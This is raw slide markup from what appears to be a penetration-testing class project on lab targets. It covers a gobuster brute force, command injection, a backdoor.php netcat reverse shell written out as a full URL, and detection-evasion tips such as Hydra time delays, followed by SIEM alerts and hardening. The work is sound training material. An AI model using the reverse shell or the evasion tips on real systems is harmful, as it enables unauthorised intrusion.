                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Used the tool gobuster for URL directory brute force attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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76" name="Google Shape;276;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2788775" y="4596725"/>
            <a:ext cx="17710625" cy="8516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SzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5660"/>
              <a:t>Exploitation: “V2 Netcat reverse shell/remote execution vulnerability”</a:t>
            </a:r>
            <a:endParaRPr sz="5660"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="282" name="Google Shape;282;p3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283" name="Google Shape;283;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717350" y="192465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indent="-508000" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploit.sh</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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84" name="Google Shape;284;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5954725" y="4827275"/>
            <a:ext cx="8983776" cy="2530450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="285" name="Google Shape;285;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9664925" y="6529950"/>
            <a:ext cx="8721650" cy="8265849"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="286" name="Google Shape;286;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="668338" y="4827275"/>
            <a:ext cx="5286375" cy="659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SzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5660"/>
              <a:t>Exploitation: “V3 Unrestricted access to WordPress directories”</a:t>
            </a:r>
            <a:endParaRPr sz="5660"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="292" name="Google Shape;292;p3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293" name="Google Shape;293;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3408175" y="192465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How did you exploit the vulnerability? </a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-508000" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Once we executed the exploit.sh file using a command injection attack, we had full access to the directories.</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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94" name="Google Shape;294;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3684800" y="5068524"/>
            <a:ext cx="14981926" cy="672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Backdooring Target 2</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="300" name="Google Shape;300;p4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301" name="Google Shape;301;p4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b="1" lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Backdoor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What kind of backdoor did you install (reverse shell, shadow user, etc.)?\</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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reverse shell/backdoor.php with netcat listner</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How did you drop it (via Metasploit, phishing, etc.)? </a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-508000" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Command injection attacks</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="4400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-508000" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://192.168.1.115/contact.php</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="4400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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How do you connect to it? </a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-508000" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.1.115/backdoor.php?cmd=nc%20192.168.1.90%204444%20/bin/bash</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="4400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="302" name="Google Shape;302;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="16923225" y="4005325"/>
            <a:ext cx="4719124" cy="4334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08" name="Google Shape;308;p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09" name="Google Shape;309;p41"/>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10" name="Google Shape;310;p41"/>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Stealth Exploitation of Target 1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="316" name="Google Shape;316;p4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317" name="Google Shape;317;p42"/>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18" name="Google Shape;318;p42"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1176950" y="3234125"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{962B4CB7-2BE8-4553-86C2-8896E5BEEF5F}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7331875"/>
                <a:gridCol w="7331875"/>
                <a:gridCol w="7331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Monitoring Overview</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Mitigation Detection</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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Open access to SSH Port 22</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SSH login Alert </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Monitor SSH Port through triggers</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Detect suspicious access to monitor geo-location and hour based alerts</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Use a </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400">
                          <a:highlight>
                            <a:srgbClr val="FFFF00"/>
                          </a:highlight>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>j</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400">
                          <a:highlight>
                            <a:schemeClr val="accent6"/>
                          </a:highlight>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>ump server</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> in the network </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Attack through a </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400">
                          <a:highlight>
                            <a:schemeClr val="accent6"/>
                          </a:highlight>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>d</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400">
                          <a:highlight>
                            <a:schemeClr val="accent6"/>
                          </a:highlight>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>iffer</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400">
                          <a:highlight>
                            <a:schemeClr val="accent6"/>
                          </a:highlight>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>ent port</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> </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Enumerate usernames in wordpress using wpscan</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CVE-2009-2334</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HTTP Response Status Code Alert</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Triggered at thresholds above 400</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Use </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400">
                          <a:highlight>
                            <a:schemeClr val="accent6"/>
                          </a:highlight>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>command line sniffing</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> rather than automated program like wpscan</a:t>
                      </a:r>
                      <a:endParaRPr sz="2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User ID susceptible to Brute-force attacks</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(CWE-307)</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Excessive HTTP Error Alert</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This alert measures the number of times an HTTP Response Status code is over 400 </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The alert would fire at a threshold of more than 5 attempts in 5 minutes.</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Spacing out the brute-force attempts through </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400">
                          <a:highlight>
                            <a:schemeClr val="accent6"/>
                          </a:highlight>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Hydra time delay</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>, using -w option on hydra command </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US" sz="2400">
                          <a:highlight>
                            <a:schemeClr val="accent6"/>
                          </a:highlight>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Alternatives to Hydra</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> may include programs like Dirbuster, DIRB, Wfuzz, Metasploit, Dirsearch</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Root password of the</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 database in the wordpress configuration file</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Detect words like a user, password or email in a string or config files using tools like Gittyleaks, Repo Security Scanner or GitGuardian generating alert logs.</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An attacker trying to hide any activity involving access to any data within a file will try to delete or manipulate all possible logs for those alerts.</a:t>
                      </a:r>
                      <a:endParaRPr sz="2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Privilege escalation via sudo python</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(CVE-2006-0151)</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SQL Database Alert - unauthorized access attempts</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Triggers when external or unauthorized IPs make connections</a:t>
                      </a:r>
                      <a:endParaRPr sz="2400">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buSzPts val="2400"/>
                        <a:buFont typeface="Roboto"/>
                        <a:buAutoNum type="arabicPeriod"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Find other vulnerabilities in the kernel and exploit them for root access</a:t>
                      </a:r>
                      <a:endParaRPr sz="24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24" name="Google Shape;324;p4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25" name="Google Shape;325;p43"/>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Maintaining Access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26" name="Google Shape;326;p43"/>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Backdooring Target 2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="332" name="Google Shape;332;p4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333" name="Google Shape;333;p44"/>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t/>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr i="1" sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="334" name="Google Shape;334;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="4088105"/>
            <a:ext cx="15808626" cy="7307500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="335" name="Google Shape;335;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="703372" y="1701000"/>
            <a:ext cx="14983301" cy="2387100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="336" name="Google Shape;336;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="15686675" y="1701003"/>
            <a:ext cx="8690974" cy="82367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42" name="Google Shape;342;p4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43" name="Google Shape;343;p45"/>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Part II: Defensive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44" name="Google Shape;344;p45"/>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Part II: Defensive Analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="351" name="Google Shape;351;p4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352" name="Google Shape;352;p4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53" name="Google Shape;353;p46"/>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Topics Covered:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="354" name="Google Shape;354;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="32592" y="3728000"/>
            <a:ext cx="243777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chemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alerts Implemented</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="355" name="Google Shape;355;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32592" y="5956133"/>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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hardening</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="356" name="Google Shape;356;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="8203400"/>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chemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Implementing Patches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0"/>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127" name="Google Shape;127;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731288" y="5165600"/>
            <a:ext cx="22914900" cy="34614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t>Network Topology</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="990"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&amp; Critical Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="990"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="Google Shape;128;p2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type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731368" y="5801542"/>
            <a:ext cx="22914900" cy="2112900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="243750" lIns="243750" spcFirstLastPara="1" rIns="243750" wrap="square" tIns="243750">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="990"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Alerts Implemented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62" name="Google Shape;362;p4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Excessive HTTP Errors</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="368" name="Google Shape;368;p4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369" name="Google Shape;369;p4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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>metric</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> does this alert monitor?</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This alert is monitoring the ‘http.response.status_code’ metric.</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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What is the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>threshold</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> it fires at?</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The threshold is reached if the grouped top five error codes exceeds 400 for the previous five minutes.</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="370" name="Google Shape;370;p48"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4910350" y="7667600"/>
            <a:ext cx="13658850" cy="466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HTTP Request Size Monitor</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
